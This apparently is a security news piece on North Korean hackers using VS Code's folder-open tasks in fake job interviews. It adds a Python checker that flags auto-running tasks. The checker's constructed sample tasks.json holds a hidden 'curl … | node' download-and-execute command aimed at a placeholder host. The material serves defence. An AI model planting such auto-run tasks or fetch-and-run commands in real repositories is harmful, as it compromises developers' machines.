URGENT UPDATE: North Korean hackers are abusing Microsoft Visual Studio Code to compromise software developers, security researchers warn. The activity is attributed to the Lazarus group and is the latest addition to its long-running “Contagious Interview” campaign, which targets software and blockchain developers in Western countries.
The attackers pose as recruiters, advertise fake job openings and, during the interview process, lure candidates into running malicious software on their own machines. The lure has proven effective: the campaign has been linked to some of the largest cryptocurrency thefts of recent years. Security researchers at Jamf have now documented a new technique in this ongoing campaign that relies on a legitimate Visual Studio Code feature rather than on a vulnerability in the editor.
The attack unfolds as follows: the hackers host malicious Git repositories on platforms such as GitHub and GitLab. During the interview, victims are asked to clone a repository and open it in Microsoft Visual Studio Code. The editor opens an unfamiliar folder in Restricted Mode and asks whether the user trusts its authors; once the victim accepts that Workspace Trust prompt, VS Code honours the task definitions in the repository's .vscode/tasks.json, and a task the attackers have configured to run on folder open executes their commands automatically.
On macOS, these commands spawn a hidden shell that downloads a JavaScript payload from a hosting platform such as Vercel. The payload then runs in a persistent loop, harvesting data such as the hostname and MAC address and sending it to a remote command-and-control (C2) server.
“We strongly recommend that customers ensure Threat Prevention and Advanced Threat Controls are enabled and set to block mode in Jamf for Mac to remain protected against the techniques described in this research,” Jamf warns.
Jamf advises developers to treat repositories received from unknown contacts as untrusted, and to review their contents, in particular anything under the .vscode directory, before marking them as trusted in Visual Studio Code. Until a workspace is trusted, the editor's Restricted Mode prevents tasks and other workspace-defined code from running; clicking through that prompt without looking is what hands the attackers code execution, with consequences for both personal and organizational security.
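The following is an added example, not code from the article or from Jamf's research. It shows what an auto-running task looks like in VS Code's tasks.json and a small checker that flags such tasks so a cloned repository can be reviewed before it is marked as trusted. The sample tasks.json is constructed for illustration (the `https://example.invalid/stage2.js` URL and the task labels are placeholders, not indicators from the campaign); the `runOptions.runOn: "folderOpen"` mechanism, the per-OS `osx`/`linux`/`windows` overrides and VS Code's acceptance of comments and trailing commas in tasks.json are documented editor behaviour.

```python
import json
import os

# Constructed sample in VS Code's JSONC dialect (comments, trailing commas).
# "postinstall" is the dangerous entry: runOn "folderOpen" starts it once the
# workspace is trusted; reveal "never" hides its terminal; URL is a placeholder.
SAMPLE_TASKS_JSON = r'''{
  // tasks.json may contain comments and trailing commas
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "command": "npm run build",
    },
    {
      "label": "postinstall", /* innocuous-looking name */
      "type": "shell",
      "command": "echo skipped",
      "osx": { "command": "curl -s https://example.invalid/stage2.js | node" },
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" },
    },
  ],
}
'''

def strip_jsonc(text):
    """Strict JSON from JSONC: comments and trailing commas are removed only
    outside string literals, so "//" inside a URL is left untouched."""
    out = []
    i, n = 0, len(text)
    in_string = False
    while i < n:
        ch = text[i]
        if in_string:
            out.append(ch)
            if ch == "\\" and i + 1 < n:  # copy escaped character verbatim
                out.append(text[i + 1])
                i += 1
            elif ch == '"':
                in_string = False
            i += 1
        elif ch == '"':
            in_string = True
            out.append(ch)
            i += 1
        elif text.startswith("//", i):
            nl = text.find("\n", i)
            i = n if nl == -1 else nl
        elif text.startswith("/*", i):
            end = text.find("*/", i + 2)
            i = n if end == -1 else end + 2
        elif ch == ",":
            j = i + 1
            while j < n and text[j].isspace():
                j += 1
            if not (j < n and text[j] in "}]"):  # drop only trailing commas
                out.append(ch)
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)

def _commands(task):
    """Command per platform; tasks.json allows osx/linux/windows overrides."""
    cmds = {}
    if "command" in task:
        cmds["default"] = task["command"]
    for key in ("osx", "linux", "windows"):
        override = task.get(key)
        if isinstance(override, dict) and "command" in override:
            cmds[key] = override["command"]
    return cmds

def find_autorun_tasks(tasks_json_text):
    """Tasks VS Code would start on folder open (runOptions.runOn == folderOpen)."""
    doc = json.loads(strip_jsonc(tasks_json_text))
    hits = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        hits.append({
            "label": task.get("label", "<unnamed>"),
            "type": task.get("type", "<unspecified>"),
            "commands": _commands(task),
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
        })
    return hits

def scan_repo(repo_dir):
    """Check a cloned repository's .vscode/tasks.json before trusting it."""
    path = os.path.join(repo_dir, ".vscode", "tasks.json")
    if not os.path.isfile(path):
        return []
    with open(path, encoding="utf-8") as fh:
        return find_autorun_tasks(fh.read())
```

Run `scan_repo(path)` on a freshly cloned directory and read every command it returns before accepting the Workspace Trust prompt; on the constructed sample it reports the hidden `postinstall` task with its macOS-specific download-and-execute command while ignoring the ordinary `build` task. The check is deliberately done with a comment-aware parser because a naive `json.loads` fails on the comments and trailing commas VS Code accepts, and a naive comment stripper would mangle the `//` inside the URL. The same check is worth running against any `.code-workspace` file in the repository, since those can also carry a tasks section.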
The Lazarus group’s Contagious Interview campaign shows how far attackers will go to reach developers, and how a routine action such as opening a repository in an editor can become the initial access vector. Developers and organizations should pair endpoint threat controls with awareness of recruiter-themed social engineering and a habit of treating unsolicited code as untrusted.
Jamf’s recommendations emphasize prevention over clean-up: block the known techniques at the endpoint, and do not grant workspace trust to code from an unverified source.
